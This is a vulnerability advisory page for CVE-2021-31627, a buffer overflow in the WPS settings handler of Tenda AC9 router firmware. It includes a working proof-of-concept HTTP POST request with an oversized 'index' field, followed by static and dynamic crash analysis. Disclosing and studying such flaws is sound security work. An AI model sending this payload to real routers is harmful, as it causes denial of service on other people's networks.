Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2021-31627

1、Basci information

vendor: Tenda

product: AC9 and so on

version: V1.0V15.03.05.19(6318)、V3.0V15.03.06.42_multi and so on

Vulnerability type: buffer overflow

Vulnerability Effect: Denial of Service

2、Principle description of vulnerability technology

Affected Vulnerability Components:

  • File name: bin/httpd
  • function: wifi wps setting

3、Vulnerability value

Stable reproducibility: Yes

exploit conditions:

  • attack vector type: neighboring network
  • Stability of exploit: every attack can be successful
  • Whether the product is configured by default: there are loopholes in the functional components that are enabled at the factory

4、PoC

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.56.102
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: password=lqetgb
Content-Length: 2444

index=ttttaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&sta_pin=tttt&wifi_chkHz=tttt

5、Vulnerability principle

5.1 static analysis

After analysis, the code causing the vulnerability is shown in the following figure. Because the parameter index imported from outside is not checked, the attacker can directly execute the sprintf of the 54 lines of the vulnerability function by constructing malicious data, resulting in the effect of buffer overflow, which eventually leads to denial of service

5.2 dynamic analysis

The crash site is as follows

Specific debugging shows that the breakpoint is set before the assembly code 0x0009B928 corresponding to sprintf of 54 lines of IDA disassembly code, and the contents of register SP are normal before the program executes this statement

When this statement is executed, an overflow occurs, and the contents of register SP become as follows

The reason for the denial of service is shown in the following figure. The instruction pop {r4,r5,fp,pc} at the address 0x0009B940 pops up the stack contents to the register PC, which causes the program to execute a nonexistent command, and finally causes the effect of denial of service

6、CNVD reference

CNVD reference